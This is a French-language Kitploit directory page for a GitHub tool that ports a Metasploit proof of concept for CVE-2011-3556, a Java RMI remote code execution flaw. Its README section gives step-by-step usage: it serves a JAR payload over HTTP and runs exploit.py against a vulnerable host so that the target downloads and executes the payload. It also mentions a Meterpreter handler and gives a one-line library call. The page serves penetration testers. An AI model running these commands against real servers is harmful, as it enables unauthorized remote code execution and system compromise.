Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve_2011_3556 — Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC). | Kitploit
Outils/GitHubGitHub/sk4la/cve_2011_3556
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsk4la/cve_2011_3556

cve_2011_3556

Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC).

Voir le dépôt
1il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2011-3556 — Preuve de concept (PoC)

Avertissement

Cet outil est une implémentation en Python 3 d'une preuve de concept (PoC) existante réalisée par mihi pour le Metasploit Framework.

Prérequis

Pour utiliser le module, suivez simplement les instructions ci-dessous :

root@kitploit:~
# Clone this repository locally.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# Optionally set the `x` bit to be able to execute the script directly.
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "It works!"

Utilisation

Ligne de commande

Pour être chargé à distance par le serveur Java RMI vulnérable, le payload (un binaire JAR) doit être servi en tant que ressource HTTP. On peut rapidement le servir en utilisant le célèbre python3 -m http.server.

Une fois le payload disponible en téléchargement, exécutez simplement le script exploit.py pour déclencher la vulnérabilité.

root@kitploit:~
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`

Si le payload est un Meterpreter (Metasploit Framework), n'oubliez pas use exploit/multi/handler.

Bibliothèque

Ce module peut également être utilisé comme une bibliothèque en important le module cve_2011_3556 dans votre espace de noms actuel :

root@kitploit:~
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()

C'est aussi simple que ça !

Crédits

Un remerciement spécial à mihi pour l'implémentation initiale du module du Metasploit Framework.

Télécharger l’outil